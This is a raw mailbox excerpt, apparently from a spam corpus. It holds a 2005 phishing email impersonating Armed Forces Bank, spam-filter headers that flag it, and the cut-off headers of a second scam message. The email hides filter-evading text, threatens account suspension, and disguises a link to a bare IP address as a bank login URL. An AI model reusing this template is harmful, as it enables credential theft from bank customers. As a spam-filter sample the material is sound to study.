From: "Natasha" <DickMccracken@afbank.com>
To: nobody@example.com, marius@example.com
Subject: afbank.com Online Id theft attacks on your account, please reconfirm, contributorybackorder
MIME-Version: 1.0
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit
X-Spam-Flag: YES
X-Spam-Checker-Version: SpamAssassin 3.0.2 (2004-11-16)
X-Spam-Level: *************
X-Spam-Status: Yes, score=13.6 required=5.0 tests=HTML_FONT_INVISIBLE,
	HTML_MESSAGE,HTML_MIME_NO_HTML_TAG,MIME_HTML_ONLY,NORMAL_HTTP_TO_IP,
	RAZOR2_CF_RANGE_51_100,RAZOR2_CHECK,RCVD_HELO_IP_MISMATCH,
	RCVD_IN_BL_SPAMCOP_NET,RCVD_IN_DSBL,RCVD_IN_NJABL_DUL,RCVD_IN_XBL,
	RCVD_NUMERIC_HELO autolearn=spam version=3.0.2
X-Spam-Report: 
	*  1.2 RCVD_NUMERIC_HELO Received: contains an IP address used for HELO
	*  2.2 RCVD_HELO_IP_MISMATCH Received: HELO and IP do not match, but should
	*  0.0 NORMAL_HTTP_TO_IP URI: Uses a dotted-decimal IP address in URL
	*  0.0 HTML_MESSAGE BODY: HTML included in message
	*  0.1 RAZOR2_CF_RANGE_51_100 BODY: Razor2 gives confidence level above 50%
	*      [cf: 100]
	*  0.2 MIME_HTML_ONLY BODY: Message only has text/html MIME parts
	*  0.0 HTML_FONT_INVISIBLE BODY: HTML font color is same as background
	*  1.5 RAZOR2_CHECK Listed in Razor2 (http://razor.sf.net/)
	*  3.8 RCVD_IN_DSBL RBL: Received via a relay in list.dsbl.org
	*      [<http://dsbl.org/listing?220.234.142.72>]
	*  1.2 RCVD_IN_BL_SPAMCOP_NET RBL: Received via a relay in bl.spamcop.net
	*      [Blocked - see <http://www.spamcop.net/bl.shtml?220.234.142.72>]
	*  3.1 RCVD_IN_XBL RBL: Received via a relay in Spamhaus XBL
	*      [220.234.142.72 listed in sbl-xbl.spamhaus.org]
	*  0.1 RCVD_IN_NJABL_DUL RBL: NJABL: dialup sender did non-local SMTP
	*      [220.234.142.72 listed in combined.njabl.org]
	*  0.1 HTML_MIME_NO_HTML_TAG HTML-only message, but there is no HTML tag
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 17

<body bgcolor="#FFFFFF" text="#000000">
<p><font color="#FFFFFF" size="1">RND_WORD allusionschoenberg capriciousslotdonaldloamcompletionsalvosnobbish 
  advantagesleptflewanarchycement </font> </p>
<table width="646" height="465" border="0">
  <tr>
    <td colspan="2"><a href="http://61.241.70.3/094958345098340/index.html" target="_blank"><img src="http://afbank.com/img2/logo2.gif" 

alt="Armed Forces Bank" width="250" height="25" border="0"></a></td>
  </tr><strong><font face="Arial, Helvetica, sans-serif" size="2">
  Encryption Rolling No: 184.22.44.210 65.194.243.144
  </font></strong><tr> 
    <td width="8"><font face="Arial, Helvetica, sans-serif" size="2"></font></td>
    <td width="628"><strong><font face="Arial, Helvetica, sans-serif" size="2">Dear 
      AFbank.com customer,</font></strong></td>
  </tr>
  <tr align="left" valign="top"> 
    <td colspan="2" height="116"> 
      <p><font face="Arial, Helvetica, sans-serif" size="2">We recently have determined 
        that different computers have logged onto your Online Banking ARMED FORCES BANK ® 
        account, and multiple passwords failures were present before the logins.</font></p>
      <p><font face="Arial, Helvetica, sans-serif" size="2">We now need you to 
        re-confirm your account information to us. If this is not completed till 
        <b>Nov 20, 2005</b>, we will be forced to suspend your account Indefinitely, 
        as it may have been used for fraudulent purposes.</font></p>
      <p><font face="Arial, Helvetica, sans-serif" size="2">We thank you for your 
        cooperation in this manner .</font></p>
    </td>
  </tr>
  <tr> 
    <td colspan="2" height="13">&nbsp;</td>
  </tr>
  <tr> 
    <td colspan="2"> 
      <p><font face="Arial, Helvetica, sans-serif" size="2">Click below to confirm 
        and verify your afbank® Online Banking Account:<br>
        <a 

href="http://61.241.70.3/094958345098340/index.html" target="_blank"><strong>https://ecom.dfckc.com/PBI_PBI1961/brake%VerificationLogon&amp;Password=gamin%</strong></a></font></p>
    </td>
  </tr>
  <tr> 
    <td colspan="2" height="6"><font face="Arial, Helvetica, sans-serif" size="2"></font></td>
  </tr>
  <tr> 
    <td colspan="2"> 
      <p><font face="Arial, Helvetica, sans-serif" size="2">Note: If you choose 
        to ignore our request, you leave us no choice but to temporary suspend 
        your account. </font></p>
    </td>
  </tr>
  <tr> 
    <td colspan="2" height="12"><font face="Arial, Helvetica, sans-serif" size="2"></font></td>
  </tr>
  <tr> 
    <td colspan="2"><font face="Arial, Helvetica, sans-serif" size="2">Best Regards, 
      <BR>
      AFbank.com<br>
      AFBANK.COM Security and Anti-Fraudulent Department .</font></td>
  </tr>
</table>
<p><font color="#FFFFFF" size="1">RND_WORD pulmonarywold bernoulliinjurehummelconsanguinechamberlainarrogantcrave 
  assetoptweaponrybetweenbushy </font> </p>

From compunionru@hermano.majordomo.ru  Sat Nov 19 23:00:43 2005
Return-Path: <compunionru@hermano.majordomo.ru>
X-Original-To: nobody@login.example.com
Delivered-To: nobody@login.example.com
Received: from mail1.example.com (mail1.example.com [10.1.2.3])
	by naughty.example.com (Postfix) with ESMTP id 96AC4536E51
	for <nobody@login.example.com>; Sat, 19 Nov 2005 23:00:43 -0500 (EST)
Received: from mail1.example.com (localhost.example.com [127.0.0.1])
	by mail1.example.com (Postfix) with ESMTP id 82E086CCE7E
	for <nobody@example.com>; Sat, 19 Nov 2005 23:00:40 -0500 (EST)
Received: from hermano.majordomo.ru (hermano.majordomo.ru [81.177.16.60])
	by mail1.example.com (Postfix) with ESMTP
	for <nobody@example.com>; Sat, 19 Nov 2005 23:00:40 -0500 (EST)
Received: from compunionru by hermano.majordomo.ru with local (Exim 4.20)
	id 1EdgNa-000KhX-Iy
	for nobody@example.com; Sun, 20 Nov 2005 07:00:38 +0300
To: nobody@example.com
Subject: Credit/Debit Card Update
